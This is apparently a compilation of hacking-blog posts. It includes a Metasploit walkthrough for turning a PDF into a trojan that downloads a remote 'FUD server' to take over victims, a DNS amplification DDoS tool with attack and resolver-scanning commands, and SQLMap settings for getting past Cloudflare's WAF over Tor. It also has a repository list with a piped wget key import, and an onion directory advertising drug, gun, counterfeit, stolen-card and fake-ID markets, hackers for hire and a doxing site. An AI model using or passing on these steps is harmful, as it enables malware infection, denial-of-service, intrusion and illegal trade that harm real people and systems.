Make your PDF file ready, upload your FUD server to a hosting service which provides direct download links, I would use Dropboxhttps://www.dropbox.com/ or Zalil http://www.zalil.ru/
And make sure that you have installed Metasploit correctly!

Now we will infect the PDF file
1.   Open up Metasploit console

2.   Type this in the console:
use exploit/windows/fileformat/adobe_pdf_embedded_exe

3.   Type this in the console:
set payload windows/download_exec

4.   Type this in console:
set INFILENAME <location of your pdf to infect here>

EXAMPLE: set INFILENAME C:/Users/Owner/Desktop/example.pdf

5.   Type this in console:
set url <direct download link to your fud server>
EXAMPLE: set url http://download.com/server.exe

6.   Type this in console:
Exploit
Now you have infected your PDF file and you will be ready to send it out, when people open the infected PDF file then it will download your server and *BAM* new slave.
(The infected PDF file will be in the same directory as the original and will be named “evil.pdf”)
Baca selengkapnya
Tsunami - DNS Amplification Attack Tool

Tsunami - DNS Amplification Attack Tool

Tsunami is a DNS Amplification Attack Tool which is collected from the internet and modified by Samiux. It is designed for testing your server and/or network under the DNS Amplification Attack. Perform this test on any server and/or network without authorization is a crime and you will be put into a jail.
The number of open recursive DNS servers and the bandwidth of the attacker as well as duration may affect the traffic volume size of the attack.
Tsunami is working perfectly on Kali Linux 1.0.7 or above.
Usage


To perform DNS Amplification attack :

python amplfiy.py -t 1.2.3.4 -s open_dns.txt -a domain_name.txt -c -1 --verify -v --threads=1000

*where 1.2.3.4 is the victim's IP address

To scan for the open recursive DNS server :

perl find_open_resolvers.pl '1.0.0.0 - 1.84.255.255' -q 1000

Remarks : this script just can check if the DNS server has the RA flag or not only. You need to double check with the following command to confirm the scanned DNS server is a true open recursive DNS server.

dig ANY isc.org @samsung.idv.tw

*where samsung.idv.tw is the open recursive DNS server
where isc.org is the domain to lookup

Tsunami comes with the following files :

amplfiy.py - the attack script
find_open_resolvers.pl - the scanner script
gov-uk_domain.txt - domain names of UK Government
open_dns_1.0.0.0-1.84.255.255.txt - open recursive DNS list within 1.0.0.0 and 1.84.255.255 IP range
Baca selengkapnya
SQLMap for Cloudflare protected sites

SQLMap for Cloudflare protected sites

When you suspect your target site is vulnerable to SQLi and you find out that it is protected by Cloudflare, you can still to launch SQLMap against the target.

First of all, you need to make sure the target site is protected by Cloudflare, you can add "--identify-waf" or "--check-waf" to confirm. However, do not set "--thread=" larger than 1 as the target will give you "403 Forbidden" error. Once you get the "403 error", your IP address is banned. Therefore, you are required to consider to use proxy servers or TOR to access the target.

Secondary, you need to add "--tamper='between,randomcase,space2comment'" and "-v 3", if the target is confirmed being protected by Cloudflare. You may also consider to add "--random-agent" and "--tor" when necessary.

Finally, do not use Kali Linux provided SQLMap scripts as it has no "WAF" scripts pre-installed. You are better to download the latest version of SQLMap from the official site.

git clone https://github.com/sqlmapproject/sqlmap.git

This hint can be applied to other WAFs, IDSs and IPSs, such as mod_security or other Cloudflare like service providers.

For example :

python sqlmap.py -u "https://www.cloudflare.com/" --identity-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor

That's all! See you.

http://samiux.blogspot.com/
Baca selengkapnya
kumpulan sources.list

kumpulan sources.list

cuma cacatan pribadi, kalo mw pakai sesuai kebutuhan .


#Bugtraq Optimus
deb http://bugtraq-team.com:6015 optimus/
#Bugtraq Debian Updates
deb http://bugtraq-team.com:6015 updates/

##### Use at your own risk! Experimental packages, visit our forum http://forum.bugtraq-team.com #####
#deb http://bugtraq-team.com:6015 experimental

##another sources
deb http://ppa.launchpad.net/wagungs/kali-linux/ubuntu precise main
deb-src http://ppa.launchpad.net/wagungs/kali-linux/ubuntu precise main
deb http://ppa.launchpad.net/wagungs/kali-linux1/ubuntu precise main
deb-src http://ppa.launchpad.net/wagungs/kali-linux1/ubuntu precise main
deb http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu precise main
deb-src http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu precise main

deb http://ppa.launchpad.net/darklordpaunik8880/darkminttrustytahr/ubuntu trusty main
deb-src http://ppa.launchpad.net/darklordpaunik8880/darkminttrustytahr/ubuntu trusty main
deb http://ppa.launchpad.net/darklordpaunik8880/darkminttrustytahr2/ubuntu trusty main
deb-src http://ppa.launchpad.net/darklordpaunik8880/darkminttrustytahr2/ubuntu trusty main
deb http://ppa.launchpad.net/darklordpaunik8880/darkminttrustytahr3/ubuntu trusty main
deb-src http://ppa.launchpad.net/darklordpaunik8880/darkminttrustytahr3/ubuntu trusty main
deb http://ppa.launchpad.net/darklordpaunik8880/4darkmint/ubuntu trusty main
deb-src http://ppa.launchpad.net/darklordpaunik8880/4darkmint/ubuntu trusty main

## BackTrack Repository
#BackTrackall
# deb http://all.repository.backtrack-linux.org/ revolution testing non-free microverse main
#BackTrack32-bit
# deb [arch=i386] http://32.repository.backtrack-linux.org/ revolution testing non-free microverse main
#BackTrack64-bit
# deb [arch=amd64] http://64.repository.backtrack-linux.org/ revolution testing non-free microverse main
#BackTracksources
# deb http://source.repository.backtrack-linux.org/ revolution testing non-free microverse main
#BackTrackupdates
# deb http://updates.repository.backtrack-linux.org/ revolution testing non-free microverse main

# INDONESIAN HACKER BACKTRACK REPOSITORY
deb http://backtrack.indonesianhacker.or.id/all revolution main microverse non-free testing
deb http://backtrack.indonesianhacker.or.id/32 revolution main microverse non-free testing
deb http://backtrack.indonesianhacker.or.id/64 revolution main microverse non-free testing
deb http://backtrack.indonesianhacker.or.id/source revolution main microverse non-free testing
root@bt:~# wget -q http://backtrack.indonesianhacker.or.id/backtrack.gpg -O- | sudo apt-key add -
root@bt:~# apt-get update && apt-get upgrade

#INDONESIAN HACKER KALI LINUX REPOSITORY
deb http://kali.indonesianhacker.or.id/kali kali main contrib non-free
deb-src http://kali.indonesianhacker.or.id/kali kali main contrib non-free
deb http://kali.indonesianhacker.or.id/kali-security kali/updates main contrib non-free
deb-src http://kali.indonesianhacker.or.id/kali-security kali/updates main contrib non-free
#root@kali:~# wget -q -O - http://kali.indonesianhacker.or.id/archive-key.asc | gpg --import

##kali linux official
##Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
##Source repositories
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
##Bleeding Edge repositories
deb http://repo.kali.org/kali kali-bleeding-edge main
#deb-src http://repo.kali.org/kali kali-bleeding-edge main

##parrot repo-kali linux mate
deb http://frozenbox.mirror.garr.it/mirrors/kali kali main contrib non-free
deb-src http://frozenbox.mirror.garr.it/mirrors/kali kali main contrib non-free
deb http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free
deb-src http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free
deb http://it.repository.frozenbox.org/mirrors/kali kali-only main contrib non-free
deb http://it.repository.frozenbox.org/mirrors/kali-security kali/updates main contrib non-free
# deb-src http://it.repository.frozenbox.org/mirrors/kali kali-only main non-free contrib
# deb-src http://it.repository.frozenbox.org/mirrors/kali-security kali/updates main contrib non-free
# deb http://it.repository.frozenbox.org/mirrors/kali kali-bleeding-edge main
# deb-src http://it.repository.frozenbox.org/mirrors/kali kali-bleeding-edge main
deb http://us.repository.frozenbox.org/parrot stable main
# deb http://us.repository.frozenbox.org/parrot testing main
deb http://it.repository.frozenbox.org/mirrors/parrot stable main
# deb http://it.repository.frozenbox.org/mirrors/parrot testing main

##iceweasel latest
deb http://mozilla.debian.net/ wheezy-backports iceweasel-release

##pepermintOS
deb http://ppa.launchpad.net/peppermintos/p6-release/ubuntu trusty main
# deb-src http://ppa.launchpad.net/peppermintos/p6-release/ubuntu trusty main

##Cyborg-Hawk-Linux
deb http://ppa.launchpad.net/cyborg-hawk/stable/ubuntu trusty main
deb-src http://ppa.launchpad.net/cyborg-hawk/stable/ubuntu trusty main

##Hades Linux : Codename
##Cyber Sec Chaos Ppa's
deb http://ppa.launchpad.net/cybersec/chaos-ppa/ubuntu trusty main
deb-src http://ppa.launchpad.net/cybersec/chaos-ppa/ubuntu trusty main
deb http://ppa.launchpad.net/cybersec/chaos-ppa-v1/ubuntu trusty main
deb-src http://ppa.launchpad.net/cybersec/chaos-ppa-v1/ubuntu trusty main
deb http://ppa.launchpad.net/cybersec/chaos-ppa-v2/ubuntu trusty main
deb-src http://ppa.launchpad.net/cybersec/chaos-ppa-v2/ubuntu trusty main
deb http://ppa.launchpad.net/cybersec/trojan-horse/ubuntu trusty main
deb-src http://ppa.launchpad.net/cybersec/trojan-horse/ubuntu trusty main

deb http://ppa.launchpad.net/darklordpaunik8880/kalibuntu1/ubuntu trusty main
deb-src http://ppa.launchpad.net/darklordpaunik8880/kalibuntu1/ubuntu trusty main

##D4rkRemaster - Remastersys without limits
deb http://ppa.launchpad.net/darklordpaunik8880/d4rkremaster/ubuntu trusty main
deb-src http://ppa.launchpad.net/darklordpaunik8880/d4rkremaster/ubuntu trusty main
Baca selengkapnya
onion tor deep web links collection

onion tor deep web links collection

++Introduction points, forums, links, search engines, information, chat, personal blogs”normal sites”
The Hidden Wiki http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page
The Uncensored Hidden wiki http://uhwikih256ynt57t.onion/wiki/index.php/Main_Page
Vault 43 (useful) http://vault43z5vxy3vn3.onion/
Imperial Library of TOR http://xfmro77i3lixucja.onion/
Yet another tor directory http://bdpuqvsqmphctrcs.onion/
Grams (search) http://grams7enufi7jmdl.onion/
The Hub (forum) http://thehub7dnl5nmcz5.onion/
Agora Forum http://lacbzxobeprssrfx.onion/
Onion soup (links n stuff) http://soupksx6vqh3ydda.onion/
TORUM (forum) http://torum4kqr55yqui6.onion/
Overchan (alittle of everything it seems) http://oniichanylo2tsi4.onion/
TORCH (search) http://xmh57jrzrnw6insl.onion/
French IRC Tor http://fitwebwmjekqsyrw.onion/
TORsearch http://kbhpodhnfxl3clb4.onion/
Yacy (search) http://yacy2tp5a2dhywmx.onion/
OnionDir (links) http://dirnxxdraygbifgc.onion/
Burnout (links) http://burnoutxf6o2yvsw.onion/
TOR Hidden Service (search) http://msydqstlz2kzerdg.onion/search/
Q&A(like yahoo answers) http://pequ3i77q5l4w4sw.onion/
Benji’s Blog http://sonntag6ej43fv2d.onion/en
Secret Stash (blog) http://dn4hcr3qhlpaiygr.onion/
Cruel Onion forum (forum for “bad* things) http://cruel2ijkqggizy5.onion/forum/
The Plague (links and things) http://zseijor556d5t4yf.onion/
Dark News (forum) http://xhb4vpn4a67sug7t.onion/
Spreadit (looks alittle like reddit) http://jdl3nf2hr3ehzyoc.onion/
Wizardry & Steamwork (search) http://kaarvixjxfdy2wv2.onion/
Myles Braithwaite http://gvvsa367g2zkzjj3.onion/
TOR links http://torlinkbgs6aabns.onion/
Nudist Paradise (site for nudists) http://qvchmzewlf4efhcw.onion/
DeepWeb Ministries (religios site) http://hxnibog5m2ocjeef.onion/
SIN Strategic INtelligence Network (be prepared for any situation) http://4iahqcjrtmxwofr6.onion/
Add any link (links) http://vizpz65utiopch7t.onion/
Shadow Life (news) http://shadow7jnzxjkvpz.onion/
Usenet file search http://wbyi72yt6gitdcqd.onion/
Liberty blog (free blogs) http://crylibertytwta4s.onion/
Intel Exchange (forum) http://rrcc5uuudhh4oz3c.onion/
GUROChan (message board) http://gurochanocizhuhg.onion/
Maxima Culpa (virtual confessions) http://nsmgu2mglfj7za6s.onion/
Onion DIR (links) http://chl7b5p6rr64po3s.onion/
Leonhard Weese (personal blog) http://liongrasr5uy5roo.onion/
YHIMA (links) http://ogbinmlotgjwgkeo.onion/
Sanctioned Suicide (forum) http://suicideocymrgxq7.onion/
anon confessions http://confessx3gx46lwg.onion/
OnionNet (links news etc) http://ubbchzof2pxs4swi.onion/
Surveilance Law http://7vrl523532rjjznj.onion/
BLue Onion (books) http://blue3237xytrz5rk.onion/blueonion/
The Hidden Forum http://ewd5a7hnvc4necnf.onion/index.php
SImple Store http://dharyyzdhok5eudi.onion/store/
Bad Ideas Forum http://7x5rg44gkhtovwjt.onion/forum/index.php
FUD (discussion board) http://bssjumzkbj3vlhiy.onion/
Hidden links http://hidhost5gk6w7ahf.onion/hidlinks/links.php
Facebook on tor? https://facebookcorewwwi.onion/
FBI Chan http://fbichanc6yfagl4l.onion/
Readers Club http://c3jemx2ube5v5zpg.onion/
Weblog http://6e3i6bqjgnmtn3fu.onion/

++ Marketplaces and stores
EasyCoin – Bitcoin Wallet with free Bitcoin Mixer. http://easycoinsayj7p5l.onion/
WeBuyBitcoins – Sell your Bitcoins for Cash, PP and more. http://jzn5w5pac26sqef4.onion/
OnionWallet – Anonymous Bitcoin Wallet and Bitcoin Laundry. http://ow24et3tetp6tvmk.onion/
EuCanna – ‘First Class Cannabis Healthcare’ http://rso4hutlefirefqp.onion/
Peoples Drug Store – The Darkweb’s Best Drug Supplier! http://newpdsuslmzqazvr.onion/
Smokeables – Finest Organic Cannabis shipped from the USA. http://smoker32pk4qt3mx.onion/
CannabisUK – UK Wholesale Cannabis Supplier. http://fzqnrlcvhkgbdwx5.onion/
DeDope – German Weed and Hash shop. (Bitcoin) http://kbvbh4kdddiha2ht.onion/
BitPharma – EU vendor for cocaine, speed, mdma, psychedelics. http://s5q54hfww56ov2xc.onion/
Brainmagic – Best psychedelics on the darknet. http://ll6lardicrvrljvq.onion/
NLGrowers – Coffee Shop grade Cannabis from the netherlands. http://25ffhnaechrbzwf3.onion/
Kamagra for Bitcoin – Same as Viagra but cheaper! http://k4btcoezc5tlxyaf.onion/
Mobile Store – unlocked iphones and other smartphones. http://mobil7rab6nuf7vx.onion/
UK Guns and Ammo – Selling Guns and Ammo from the UK. http://tuu66yxvrnn3of7l.onion/
Rent-A-Hacker – Hacking, DDOS, Social Engeneering etc. http://2ogmrlfzdthnwkez.onion/
Onion Identity Services – Selling Passports and ID-Cards. http://abbujjh5vqtq77wg.onion/
HQER – High quality euro bills replicas / counterfeits. http://y3fpieiezy2sin4a.onion/
USD Counterfeits – High quality USD counterfeits. http://qkj4drtgvpm7eecl.onion/
USA Citizenship – Get a real USA passport. http://xfnwyig7olypdq5r.onion/
Apples4Bitcoin – Cheap Apple products for Bitcoin. http://tfwdi3izigxllure.onion/
ccPal – CCs, CVV2s, Ebay, Paypals and more. http://3dbr5t4pygahedms.onion/
EuroGuns – Your #1 european arms dealer. http://2kka4f23pcxgqkpv.onion/
UK Passports – Original UK Passports. http://vfqnd6mieccqyiit.onion/
USfakeIDs – High quality USA Fake Drivers Licenses. http://en35tuzqmn4lofbk.onion/

++ Tech, technology, computers, hackers for hire, hacking/anarchy related materials
Anything I come across that looks technical in any way will be lumped into this category. Could just be a small snipet of code. Could be hack/phreak vines from 20 years ago. Could be a company that offers some sort of computer related service that I just dont understand
MacLemon (security, news, links) http://fzybdgczph7xfdnr.onion/
TOR Status – Tor network status http://jlve2y45zacpbz6s.onion/
TorPGP public key server http://torpgp3ujaysucll.onion/
Altera Praxis (not sure what this is tbh) http://ncivdawfxihoh7sj.onion/about.html
keybase (some sort of hacker/stalker tool idk) http://fncuwbiisyh6ak3i.onion/
Tor Web Devolper (for hire) http://qizriixqwmeq4p5b.onion/
Web Programmer (for hire) http://kobrabd77ppgjd2r.onion/
Ozy’s Hacking Service (hacker for hire) http://ozy7mnciacbc5idc.onion/
Pioopioo’s Services (hacker for hire) http://rowtogxp2akwem6n.onion/
Hacker place http://hackerw6dcplg3ej.onion/
Parazite (anarchy info mainly) http://kpynyvym6xqi7wz2.onion/
DNS support forum http://mj6vjwhtyahcj6fx.onion/
BitMessage mail gateway http://bitmailendavkbec.onion/
Keys Open Doors http://wdnqg3ehh3hvalpe.onion/
Hidden Service howto http://nfokjgfj3hxs4nwu.onion/
JRAT (java remote administration tool) http://jratoc334zo7zgis.onion/
FILTH (fuck i love to hack) http://om2ak3coziov3dbc.onion/forum/index.php
Onion Domains & MD5sums http://xlmvhk3rpdux26dz.onion/
Soylent News http://skgmctqnhyvfava3.onion/
Bluish Coder http://mh7mkfvezts5j6yu.onion/
Cable Viewer (idk what this is but its techy) http://leakager742hufco.onion/
Xerbot http://xfthw4bq7lx2y726.onion/
Hack Canada http://hackcanl2o4lvmnv.onion/
Imperial anarchist despotism http://rgeo5wj7gneidzh3.onion/
Directory Listing Denied (anon web ftp) http://wtutoxfznz45gf6c.onion/
Anarplex (some kind of computer anarchy) http://y5fmhyqdr6r7ddws.onion/
GhostDeveloper (freelance programmer) http://develggxuazrcokn.onion/
SKS Onion key server http://lbnugoq5na3mzkgv.onion/index.html
GNUPG http://ic6au7wa3f6naxjq.onion/
Cat facts http://2v7ibl5u4pbemwiz.onion/
Chess (game) http://theches3nacocgsc.onion/
Necro town (links n stuff) http://nekrooxwwskakacj.onion/
Encryption Password Generator http://pwgenmwi7eqsys76.onion/
rows.io jabber http://yz6yiv2hxyagvwy6.onion/
M5S leaks http://33pvcdba2nm3afnj.onion/
A cgi proxy http://x5yd2gfthlfgdqjg.onion/
FIT French IRC TOR http://fit2v7z4plpfyh2h.onion/
The Linux Documentation Project http://3c2rvufmbcggnqi6.onion/
Crypto Party http://cpartywvpihlabsy.onion/
Hive Archives http://thehivemwon6a5mp.onion/
txtorcon (python contril library for tor) http://timaq4ygg2iegci7.onion/
Rhodium (science stuff) http://rhodiumio4b7b4rm.onion/
Hackerspace Prague http://pmwdzvbyvnmwobk5.onion/


++ Political, activists, groups, journalism, whistle blowing etc
Youth Rage forum http://neyigf7eragkp5nq.onion/forum/
Associated Whistleblowers http://w6csjytbrl273che.onion/#/
Community X recruitment http://gp5tycij54ri7xcz.onion/
Code Green (ethical hacktivism) http://pyl7a4ccwgpxm6rd.onion/
Infodio Leaks http://ymi7h25hgp3bj63v.onion/#/
Wiki Leaks http://zbnnr7qzaxlk5tms.onion/
Zwitterion’s Domain http://3il6wiev2pnk7dat.onion/
Secure wildlife whistle blowing http://ppdz5djzpo3w5k2z.onion/#/
Freedom of the press foundation http://freepress3xxs3hk.onion/
the loli advocacy server http://lolikaastbgo5dtk.onion/
Global Leaks http://h73hx2munq7q465s.onion/#/
Tactical Technology http://hrkdpwrkh3lbow2l.onion/
Fund the islamic struggle http://teir4baj5mpvkg5n.onion/
Internet Governance Transparency http://k52lcjc5fws3jbqf.onion/
We fight censorship http://3kyl4i7bfdgwelmf.onion/
Anon Insiders http://imtrjn3qe2tzh5ae.onion/
Map Mos Maiorum (refugee help) http://iuektur6bicvfwcq.onion/ushahidi/
wiki leaks http://jwgkxry7xjeaeg5d.onion/

++ Anonymity, Security
includes secure email, chat, etc
Anonet wiki http://xz2rtmpjjwvdw44p.onion/
Secure Messaging http://sms4tor3vcr2geip.onion/
MailTor http://mailtoralnhyol5v.onion/src/login.php
Lelantos email http://lelantoss7bcnwbv.onion/
Onion Mail http://p6x47b547s2fkmj3.onion/
JitJat (messaging) http://jitjatxmemcaaadp.onion/login.php
TOR PasteBin http://postits4tga4cqts.onion/
RetroShare chat server http://chat7zlxojqcf3nv.onion/
ProtectTOR55 http://protector55z5s7j.onion/
Zerobin http://zerobinqmdqd236y.onion/
TOR chat roulette http://tetatl6umgbmtv27.onion/
SIGAINT (email) http://sigaintevyh2rzvw.onion/
Offshore mail server http://inocncymyac2mufx.onion/
web/irc chat thing http://6ejbuiwnp77gu67h.onion/
FreeFor (chat) http://tns7i5gucaaussz4.onion/
Volatile (chat n stuff) http://vola7ileiax4ueow.onion/

++ Hosting, web, file, image
Onionweb File Hosting (100mb limit) http://3fnhfsfc2bpzdste.onion/
Hidden Hosting http://7zzohostingx4mes.onion/
Free Hosting links http://a5ok374pjcq7bsyp.onion/
Darknet services http://darknet4x3hcv5zp.onion/
Infernet Dark Hosting http://a5ok374pjcq7bsyp.onion/
IMG.BI (image hosting) http://imgbifwwqoixh7te.onion/
Secure Drop http://v6gdwmm7ed4oifvd.onion/
CYRUSERV http://cyruservvvklto2l.onion/
Free TOR Hosting http://zuxtem3jcv2fvmgk.onion/
Home Hosting (how to) http://dmru36nvfgtywx47.onion/
Real Hosting http://hosting6iar5zo7c.onion/
TorSafe (file hosting) http://torsafeiwttlkul6.onion/accounts/login/
Real Hosting http://ezuwnhj5j6mtk4xr.onion/
TOR VPS http://torvps7kzis5ujfz.onion/index.php/TorVPS
Kowloon (hosting) http://kowloon5aibdbege.onion/
Onion Pastebin http://pastetorziarobi7.onion/
Popfiles (file hosting) http://popfilesxuru7lsr.onion/
Hidden Hosting http://offshore6gq7ykr7.onion/
Darknet Solutions (hosting and design) http://darknet47je5xwm6.onion/
Onion uploader (file hosting up to 100mb) http://nk3k2rsitogzvk2a.onion/
Media, music, movies, art, cartoons, comics etc*
Skeletor.bit http://okzatvfk2jzgvmf4.onion/
Yay Ponies http://ponieslzi3ivbynd.onion/
HFS (music) http://wuvdsbmbwyjzsgei.onion/
Sea Kitten Palace (torrents) http://wtwfzc6ty2s6x4po.onion/
Manga http://negimarxzov6ca4c.onion/
Comics http://7etxnv26hro7mmuu.onion/
Deep Tune (music) http://tune4xs6mj2evcr6.onion/
TorFlix (movies) http://jl4m7ubpotnu2yos.onion/
No name, not sure if its music or speak but its mp3’s http://xf3fjq4b7j6pswuq.onion/
Gone Things (printable images) http://32ixi6myw3things.onion/
ORVoice (music) http://orvoicemur72h7rx.onion/TOR/
Index of (music) http://uuxrei5or65anucg.onion/
My little pony http://mlpfimf74svi6y4q.onion/s01/
The audiobook vault http://xmctuxj7dsymumwf.onion/

++ I just dont know what this exactly. Weird stuff. Some are just login pages that I didnt take time to register for. Help me categorize these pls
DOXBIN http://doxbinbircrfbqvg.onion/ This is a big list of peoples personal information basicly, seems like a dump for info that hackers might want to retreive at a later date, but also seems like a show off site. Im not sure how to interpret all this
Riseup http://zsolxunfmbfuq7wf.onion/rc/
Thunder’s Place (penis enlargement) http://thundersplv36ecb.onion/
Smart5 (forum, for what idk though) http://smart5ywvuwbmzfd.onion/
German TOR Library (documents, files, on what subject idk) http://pqfja3rzroprkfq6.onion
Dying Breed (forum, idk what for) http://g6o7aurv4c3ixalq.onion/index.php
Hers some random cords. lat/long http://4k2oq3fswx35a72s.onion/
Zyprexa kills http://tdkhrvozivoez5ad.onion/
Cat out of the bag http://vkpriz2cjzymgpsp.onion/
XL33tVill3 (links and idk what) http://tt75atziadj4duff.onion/sindex.html
i really dont know what to say http://rjzdqt4z3z3xo73h.onion/
Solar display http://zgypn3izock2oqny.onion/
GIF files (global intelligence files) http://gkqmy7ioqptiru5o.onion/gifiles/
Hacked http://7o46qra2jkz3k3kx.onion/
GreatDumps http://www.greatobxvv7etokq.onion/?login.do/
International journal of proof of concept or GTFO http://pocgtfo7tu77thrp.onion/
Evolution http://k5zq47j6wd3wdvjq.onion/login?request_path=%2F
Elize chatbot http://opnju4nyz7wbypme.onion/
Cryptome (im not sure where to put this so its here) http://y6q2mnorhmsfdm3r.onion/
Pastebin http://5aklnwbibkhrtbs6.onion/onion tor deep web links collection
Baca selengkapnya